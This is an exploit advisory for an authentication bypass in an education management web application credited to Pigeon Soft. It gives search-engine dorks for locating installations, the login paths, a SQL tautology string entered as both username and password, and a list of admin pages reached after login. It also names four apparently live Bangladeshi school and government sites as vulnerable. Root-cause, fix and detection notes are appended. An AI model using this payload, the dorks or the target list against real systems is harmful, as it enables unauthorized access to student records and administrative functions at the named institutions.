#################################################################################################
# Exploit Title : WordPress Developed By Pigeon Soft Bangladesh Education Management Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/11/2018
# Vendor Homepage : pigeon-soft.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Developed By Pigeon Soft'' site:bd
intext:''Powered By Pigeon Soft'' site:bd
# Exploit Risk : Medium
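# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ] (CWE-592 is a deprecated entry; the bypass string given below is a SQL tautology, so the underlying weakness also fits CWE-89 - [ SQL Injection ])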
#################################################################################################
# Admin Panel Login Path :
/app/login.php
/wp-login.php
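# Authentication Bypass Exploit :
Admin Username : '=''or'
Admin Password : '=''or'
# Root Cause : the same quote-based SQL tautology is accepted in both fields, which indicates that the login handler ( /app/login.php above ) concatenates the submitted username and password into its SQL query without escaping or parameter binding ( SQL injection, CWE-89 ).
# Fix : build the login query with prepared statements and bound parameters, verify the password against a stored salted hash in application code rather than inside the SQL statement, and enforce a server-side session check at the top of every page under /app/.
# Detection : quote characters combined with "or" in the login POST fields, and requests to /app/ pages from clients with no preceding successful login, are worth alerting on in web server or WAF logs.
# Pages listed by the author ( presumably the admin pages reachable once logged in ) :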
/app/index.php
/app/add-student.php
/app/students.php
/app/addworkingday.php
/app/studentin.php
/app/student-out.php
/app/report-attendance.php
/app/editmark.php
/app/public/admission-form.php
/app/admission-list.php
/app/admit.php
/app/print-admit.php
/app/update-result.php
/app/new-semester-plan.php
/app/semester-plan.php
/app/member-req.php
/app/update-list.php
/app/memberlist.php
/app/reports.php
/app/public/register-check.php
/app/create-message.php
/app/send-email.php
/app/public/membership.php
/app/update-settings.php
#################################################################################################
# Example Vulnerable Sites =>
[+] bograpoly.gov.bd/app/index.php
[+] gmmhs.edu.bd/app/login.php
[+] gfisc.edu.bd/app/login.php
[+] itihasacademybd.com/app/login.php
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################